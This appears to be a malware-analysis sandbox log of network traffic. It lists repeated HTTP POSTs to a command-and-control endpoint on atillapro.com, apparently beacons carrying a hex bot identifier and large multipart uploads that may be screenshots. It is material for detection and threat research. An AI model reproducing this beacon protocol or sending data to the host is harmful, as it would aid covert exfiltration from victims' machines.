Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUyNjE=Host: atillapro.comContent-Length: 85413Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTExMjQ=Host: atillapro.comContent-Length: 91276Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUwOTg=Host: atillapro.comContent-Length: 85250Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 37 41 35 45 44 45 34 34 37 37 39 41 46 42 38 46 43 39 41 41 33 43 44 30 34 37 42 35 32 37 32 36 31 42 41 31 38 39 30 41 39 30 43 38 37 39 37 36 37 32 33 30 34 44 36 39 42 37 30 34 32 42 35 39 34 46 35 44 36 36 30 32 36 42 30 39 46 46 43 34 39 39 39 35 35 34 36 33 36 37 32 45 37 39 38 44 41 34 42 38 34 37 44 35 41 36 44 31 38 42 36 33 36 32 43 31 43 46 42 39 35 32 42 36 36 41 39 34 32 38 30 44 42 37 42 33 39 43 38 41 30 38 45 42 39 31 41 41 39 33 39 39 37 32 Data Ascii: r=7A5EDE44779AFB8FC9AA3CD047B527261BA1890A90C8797672304D69B7042B594F5D66026B09FFC499955463672E798DA4B847D5A6D18B6362C1CFB952B66A94280DB7B39C8A08EB91AA939972
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: atillapro.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /vsdjcn3khS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTEwNDE=Host: atillapro.comContent-Length: 91193Cache-Control: no-cache
